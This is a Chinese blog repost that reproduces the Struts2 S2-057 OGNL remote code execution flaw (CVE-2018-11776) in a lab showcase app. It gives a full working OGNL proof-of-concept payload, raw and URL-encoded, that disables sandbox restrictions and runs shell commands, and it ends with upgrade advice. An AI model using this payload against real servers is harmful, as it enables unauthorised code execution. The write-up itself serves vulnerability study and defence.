我是靠谱客的博主 愤怒鞋垫,最近开发中收集的这篇文章主要介绍Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

漏洞介绍

名称: struts2 代码执行 (CVE-2018-11776)

描述: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞

影响版本

Struts 2.3.34,Struts 2.5.16

漏洞复现

访问靶机地址

http://ip:port/struts2-showcase/

 构造payload访问

/struts2-showcase/$%7B233*233%7D/actionChain1.action

利用BurpSuite抓包并改包,可以看到,233X233的结果已经在Location头中返回,说明存在漏洞。

 构造POC,替换掉请求内容

原始poc

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码后的poc

/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

 漏洞防御

目前官方已发布最新版本来修复此漏洞,受影响的用户请尽快升级到Apache Struts 2.3.35 或Struts 2.5.17版

漏洞发现者的博客:https://lgtm.com/blog/apache_struts_CVE-2018-11776

最后

以上就是愤怒鞋垫为你收集整理的Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御的全部内容,希望文章能够帮你解决Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(43)

评论列表共有 0 条评论

立即
投稿
返回
顶部